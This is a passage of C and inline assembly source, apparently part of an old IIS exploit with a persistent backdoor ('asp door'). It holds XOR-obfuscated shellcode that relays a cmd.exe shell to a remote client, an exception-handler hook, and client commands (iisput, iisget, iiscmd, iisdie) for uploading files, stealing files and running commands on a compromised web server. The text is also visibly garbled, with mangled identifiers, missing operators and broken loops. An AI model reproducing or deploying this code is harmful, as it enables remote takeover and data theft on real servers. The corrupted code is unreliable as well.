While (1) { Peeknamedpipeadd (Hreadpipe1, Buff, Shellbuffsize, & lbytesRead, 0, 0); IF (LbytesRead> 0) { i = 0; Readfileadd (Hreadpipe1, Buff, LbytesRead, & lbytesread, 0); IF (LbytesRead> 0) { FOR (k = 0; k Lockintvar2 = lockintvar2 * 0x100; Lockintvar2 = lockintvar2% LockBignum; LockCharvar = Lockintvar2% 0x100; BUFF [K] ^ = LOCKCHARVAR; // DataXorcode; // buff [k] ^ = DataXorcode; } WriteClient (Connid, Buff, & lbytesRead, 0); // hse_io_sync); // SleepAdd (20); } } Else { // SleepAdd (10); L = 0; IF (i <50) { L = 1; i; K = 1; LbytesRead = 0; } While (l == 0) { i = 0; Lbytesread = shellbuffsize; K = ReadClient (ConnID, BUFF, & LBYTESREAD); For (l = 0; l Lockintvar1 = Lockintvar1 * 0x100; Lockintvar1 = lockintvar1% LockBignum; Lockcharvar = lockintvar1% 0x100; BUFF [L] ^ = LOCKCHARVAR; // DataXorcode; } IF (k == 1 && lbytesread> = 5 && buff [0] == 'i' && buff [1] == 'i' && buff [2 ] == 's' && buff [3] ==' c '&& buff [4] ==') { K = 8; Writefileadd (HWritePiPiPi2, Stradd, K, & K, 0); // EXIT cmd.e XE WritefileAdd (hwritepipe2, stradd, 
k, & k, 0); // exit cmd.exe stradd2 = BUFF 5; BUFF [LbytesRead] = 0; Goto IISCMD; } IF (k == 1 && lbytesread> = 5 && buff [0] == 'r' && buff [1] == 'e' && buff [2 ] == 's' && buff [3] == 'e' && buff [4] == 't') { LbytesRead = 0x0c; WriteClient (Connid, Stradd 0x11, & lbytesRead, 0); Lockintvar1 = shelllocknum% LockBignum; Lockintvar2 = Lockintvar1; LbytesRead = 0; } IF (k == 1 && lbytesread> = 5 && buff [0] == 'i' && buff [1] == 'i' && buff [2 ] == 's' && buff [3] == 'r' && buff [4] == 'r') { K = 8; Writefileadd (HWritePiPiPi2, Stradd, K, & K, 0); // EXIT cmd.e XE Writefileadd (HWritePiPiPi2, Stradd, K, & K, 0); // EXIT cmd.e XE * (int *) (dooradd-0x0c) = 0; SleepAdd (0x7ffffff); _asm { MOV EAX, 0 MOV ESP, 0 JMP EAX } } IF (k == 1 && lbytesread> 4 && buff [0] == 'p' && buff [1] == 'u' && buff [2] = = 't' && buff [3] == ') { L = * (int *) (buff 4); // WritefileAdd (FPT, BUFF, LBYTESREAD, & LBYTESREAD, NULL); FPT = CREATEFILEAADD (buff 0x8, file_flag_write_through gene Ric_Write, File_Share_read, null, create_always, file_attribute_normal, 0); K = getLasterRoradd (); i = 0; While (l> 0) { Lbytesread = shellbuffsize; K = ReadClient (ConnID, BUFF, & LBYTESREAD); IF (k == 1) { IF (LbytesRead> 0) { FOR (k = 0; k Lockintvar1 = Lockintvar1 * 0x100; Lockintvar1 = Lockintvar1% Lockbignum; Lockcharvar = lockintvar1% 0x100; BUFF [K] ^ = LOCKCHARVAR; // DataXorcode; } L- = lbytesread; // if (fpt> 0) WritefileAdd (FPT, BUFF, LBYTESREAD, & LBYTESREA D, NULL); // Else SleepAdd (010); } // if (i> 100) l = 0; } Else { SleepAdd (0100); i; } IF (i> 10000) l = 0; } CloseHandleAdd (FPT); L = 0; } Else { IF (k == 1 && lbytesread> 4 && buff [0] == 'g' && buff [1] == 'e' && buff [2] == 'T' && buff [3] == ') { // fpt = cretefileaadd (buff 4, generic_read, file_share _Read, null, open_existing, file_attribute_normal, 0); FPT = CREATEFILEAADD (Buff 4, Generic_Read, File_Share_R EAD File_Share_Write, Null, Open_EXISTING, FILE_ATTRIBUTE_NORMAL, 0); SleepAdd (100); L = getFileSizeAdd (fpt, & k); 
* (int *) BUFF = 'EZIS'; // size * (int *) (BUFF 4) = L; LbytesRead = 8; For (i = 0; i Lockintvar2 = lockintvar2 * 0x100; Lockintvar2 = lockintvar2% LockBignum; LockCharvar = Lockintvar2% 0x100; BUFF [I] ^ = LOCKCHARVAR; // DataXorcode; } WriteClient (Connid, Buff, & lbytesRead, 0); // HSE_IO_S YNC); // SleepAdd (100); i = 0; While (l> 0) { K = shellbuffsize; ReadfileAdd (FPT, BUFF, K, & K, 0); IF (k> 0) { For (i = 0; i Lockintvar2 = lockintvar2 * 0x100; Lockintvar2 = lockintvar2% LockBignum; LockCharvar = Lockintvar2% 0x100; BUFF [I] ^ = LOCKCHARVAR; // Dataxorcode ; } i = 0; L- = K; WriteClient (connid, buff, & k, 0); // hse_io_sy NC); // SleepAdd (100); // k = readclient (connid, buff, & lbytesread); } ELSE i; IF (i> 100) l = 0; } CloseHandleAdd (FPT); L = 0; } Else L = 1; } } IF (k! = 1) { K = 8; WritefileAdd (hwritepipe2, stradd, k, & k, 0); // exit cmd.exe WritefileAdd (hwritepipe2, stradd, k, & k, 0); // exit cmd.exe WritefileAdd (hwritepipe2, stradd, k, & k, 0); // exit cmd.exe K = getLasterRoradd (); While (k == 0x2746) { IF (thisDoor == 1) goto asmreturn; SleepAdd (0x7ffffff); // is dead } } Else { WritefileAdd (hwritepipe2, buff, lbytesread, & lbytead, 0); // SleepAdd (1000); } } } Die: Goto Die; _asm { Asmreturn: MOV EAX, HSE_STATUS_SUCCESS Leave Ret 04 Door: Push EAX MOV EAX, [ESP 0x08] Mov Eax, [EAX 0x64] Mov Eax, [EAX] CMP EAX, 'OK !!' 
JNZ JMPold POP EAX Push 0x12345678 // dooradd-0x13 RET JMPold: POP EAX Push 0x12345678 // dooradd-0xc Ret // 1 JMP DOOR / / 2 GetDoorcall: Call getDooradd //5 getExceptretadd: POP EAX Push EAX MOV EDI, DWORD PTR [stradd] MOV DWORD PTR [EDI-0X0E], EAX RET Errprogram: MOV Eax, DWORD PTR [ESP 0x0c] Add Eax, 0xB8 Mov DWORD PTR [EAX], 0x11223344 // stradd-0xe XOR Eax, EAX / / 2 Ret // 1 ExecptProgram: JMP errprogram // 2 bytes stradd-7 NextCall: Call getstradd //5 bytes NOP NOP NOP NOP NOP NOP NOP NOP NOP } } Void Cleanchkesp (Char * Fnadd, Char * Shellbuff, Char * Chkesp, Int Len) { INT I, K; UNSIGNED CHAR TEMP; Char * Calladd; For (i = 0; i Temp = shellbuff [i]; IF (Temp == 0xE8) {k = * (int *) (ShellBuff i 1); Calladd = fnadd; Calladd = k; Calladd = i; Calladd = 5; IF (calladd == chkesp) { Shellbuff [I] = 0x90; ShellBuff [i 1] = 0x43; // incn Shellbuff [i 2] = 0x4b; // DEC EBX Shellbuff [i 3] = 0x43; Shellbuff [i 4] = 0x4b; } } } } Void Iisput (int FD, Char * STR) { Char * filename; Char * filename2; File * fpt; Char buff [0x2000]; INT size = 0x2000, i, j, filesize, filesishigh; Filename = "/ 0"; Filename2 = "/ 0"; J = Strlen (STR); For (i = 0; i IF (* str! = '') { Filename = STR; Break; } } For (; i IF (* str == '') { * Str = 0; Break; } } i; STR; For (; i IF (* str! 
= '') { Filename2 = STR; Break; } } For (; i IF (* str == '') { * Str = 0; Break; } } IF (filename == "/ x0") { Printf ("/ n iisput filename [path // fieename] / n"); Return; } IF (filename2 == "/ x0") filename2 = filename; Printf ("/ N Begin Put File:% S", FileName); J = 0; IOCTLSOCKET (FD, Fionbio, & J); Sleep (1000); FPT = CREATEFILE (filename, generic_read, file_share_read, null, open_existing, file _Ttribute_normal, 0); FileSize = GetFileSize (FPT, & FileSizehigh); STRCPY (BUFF, "PUT"); * (int *) (buff 4) = filesis; FileSize = * (int *) (buff 4); STRCPY (BUFF 0x8, filename2); Newsend (FD, BUFF, I 0X9, 0); Printf ("/ N Put File:% S To File:% S% D Bytes", FileName, FileName2, FileSize; Sleep (1000); While (filesis> 0) { Size = 0x800; ReadFile (FPT, BUFF, SIZE, & SIZE, NULL); IF (size> 0) { FileSize- = size; Newsend (FD, BUFF, SIZE, 0); // Sleep (0100); } } // size = filesize; // readfile (FPT, BUFF, SIZE, & SIZE, NULL); // if (size> 0) Send (FD, BUFF, SIZE, 0); CloseHandle (FPT); J = 1; IOCTLSOCKET (FD, Fionbio, & J); Printf ("/ N Put File OK! / N"); Sleep (1000); } Void Iisget (int FD, CHAR * STR) { Char * filename; Char * filename2; File * fpt; Char buff [0x2000]; INT size = 0x2000, i, j, filesize, filesishigh; Filename = "/ 0"; Filename2 = "/ 0"; J = Strlen (STR); For (i = 0; i IF (* str! = '') { Filename = STR; Break; } } For (; i IF (* str == '') { * Str = 0; Break; } } i; STR; For (; i IF (* str! 
= '') { Filename2 = STR; Break; } } For (; i IF (* str == '') { * Str = 0; Break; } } IF (filename == "/ x0") { Printf ("/ n Iisget filename [path // fieename] / n"); Return; } IF (filename2 == "/ x0") filename2 = filename; Printf ("/ N Begin Get File:% S", FileName); FPT = CREATEFILEA (filename, file_flag_write_through generic_write, file_share_re AD, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); STRCPY (BUFF, "GET"); STRCPY (BUFF 0x4, filename2); Newsend (FD, BUFF, I 0X5, 0); Printf ("/ N get file:% s from file:% s", filename, filename2; J = 0; IOCTLSOCKET (FD, Fionbio, & J); i = 0; FILESIZE = 0; J = 0; While (j <100) { // SLEEP (100); I = NewRecv (FD, BUFF, 0X800, 0); IF (i> 0) { BUFF [I] = 0; IF (Memcmp (BUFF, "SIZE", 4) == 0) {filesize = * (int *) (buff 4); J = 100; } Else { / * For (j = 0; j
Lockintvar1 = Lockintvar1 * 0x100; Lockintvar1 = lockintvar1% LockBignum; Lockcharvar = lockintvar1% 0x100; Buff [J] ^ = LOCKCHARVAR; // DataXorcode; } * / J = 0; Printf ("/ N Recv% S", BUFF); } } Else J; // IF (j> 1000) i = 0; } Printf ("/ n file% D Bytes% D / N", FileSize, i); IF (i> 8) { I- = 8; FileSize- = i; Writefile (FPT, BUFF 8, I, & I, NULL); } While (filesis> 0) { Size = NewRecv (FD, BUFF, 0X800, 0); IF (size> 0) { FileSize- = size; Writefile (FPT, BUFF, SIZE, & SIZE, NULL); } Else { IF (size == 0) { Printf ("/ n ftp close / n"); } Else { Printf ("/ n sleep (100)"); Sleep (100); } } } CloseHandle (FPT); Printf ("/ n get file ok! / n"); J = 1; IOCTLSOCKET (FD, Fionbio, & J); } Void Iisreset (int FD, Char * Str) { Char buff [0x2000]; INT I, J; Printf ("/ NRESET XOR DATA./N); Sleep (1000); J = 0; IOCTLSOCKET (FD, Fionbio, & J); STRCPY (BUFF, "reset"); Newsend (FD, BUFF, STRLEN (BUFF), 0); Sleep (1000); Lockintvar1 = lockbignum2% LockBignum; Lockintvar2 = Lockintvar1; While (1) { J = RECV (FD, BUFF, 0X2000, 0); IF (j> 0) { BUFF [J] = 0; For (i = 0; i IF (buff [i] == 0) BUFF [i] = 'b'; } // Printf ("/ NRECV 0x% x Bytes:% S", J, BUFF); IF (strs ")! 
= 0) { Printf ("/ Nxor Data RESET OK./N"); For (i = strstr (buff, "xordatareset") - BUFF 0x0c; i Lockintvar1 = Lockintvar1 * 0x100; Lockintvar1 = lockintvar1% LockBignum; LockCharvar = lockintvar1% 0x100; buff [i] ^ = Lockchaarvar; // DataXorcode; } Break; } } // else if (j == 0) Break; // strcpy (buff, "/ r / nmkdir D: // TEST6 / R / N"); // Newsend (FD, BUFF, STRLEN (BUFF), 0); } Sleep (1000); J = 1; IOCTLSOCKET (FD, Fionbio, & J); // Printf ("aaa"); } Void IISDIE (int FD, Char * STR) { CHAR BUFF [0x200]; Int J; Printf ("/ niis die./n"); J = 0; IOCTLSOCKET (FD, Fionbio, & J); Sleep (1000); STRCPY (BUFF, "IISRR"); Newsend (FD, BUFF, STRLEN (BUFF), 0); Sleep (1000); J = 1; IOCTLSOCKET (FD, Fionbio, & J); Lockintvar1 = lockbignum2% LockBignum; Lockintvar2 = Lockintvar1; } Void iiSCMD (int FD, Char * STR) { Char * cmd = "/ 0"; CHAR BUFF [2000]; INT I, J; J = Strlen (STR); For (i = 0; i IF (* str! = '') { CMD = STR; Break; } } J = Strlen (STR); For (i = 0; i IF (* (STR J-I-1)! = ') { Break; } ELSE * (STR J-I-1) = 0; } IF (cmd == "/ x0") { Printf ("/ niiscmd cmd / n"); Return; } Printf ("/ NBEGIN RUN CMD:% S", CMD); J = 0; IOCTLSOCKET (FD, Fionbio, & J); Sleep (1000); STRCPY (BUFF, "IISC"); STRCAT (BUFF, CMD); Newsend (FD, BUFF, STRLEN (BUFF), 0); Sleep (1000); J = 1; IOCTLSOCKET (FD, Fionbio, & J); / * Lockintvar1 = lockbignum2% LockBignum; Lockintvar2 = Lockintvar1; * / } INT NewRecv (int FD, Char * Buff, Int size, int flag) { INT I, K; K = RECV (FD, BUFF, SIZE, FLAG); IF (xordATABEGIN == 1) { For (i = 0; i Lockintvar1 = Lockintvar1 * 0x100; Lockintvar1 = lockintvar1% LockBignum; Lockcharvar = lockintvar1% 0x100; BUFF [I] ^ = LOCKCHARVAR; // DataXorcode;} } Else { IF (k> 0) { BUFF [K] = 0; IF (strstr (buff, "xordata")! 
= 0) { XORDATABEGIN = 1; For (i = strstr (buff, "xordata") - BUFF 8; i Lockintvar1 = Lockintvar1 * 0x100; Lockintvar1 = lockintvar1% LockBignum; Lockcharvar = lockintvar1% 0x100; BUFF [I] ^ = LOCKCHARVAR; // DataXorcode; } } } } Return (K); } Int Newsend (int FD, CHAR * BUFF, INT SIZE, INT FLAG) { INT I; For (i = 0; i Lockintvar2 = lockintvar2 * 0x100; Lockintvar2 = lockintvar2% LockBignum; LockCharvar = Lockintvar2% 0x100; BUFF [I] ^ = LOCKCHARVAR; // DataXorcode; // buff [i] ^ = DataXorcode; } Return (SEND (FD, BUFF, SIZE, FLAG); } Void Iishelp () { Printf ("/ Nusage:"); Printf ("/ Niisget FileName FileName. Get File from Web Server."); Printf ("/ Niisput FileName FileName. Put File to Web Server."); Printf ("/ Niiscmd CMD. Run CMD on Web Server."); Printf ("/ niisreset. reset the xor data."); Printf ("/ niisdie. reset the asp door."); Printf ("/ n / n"); }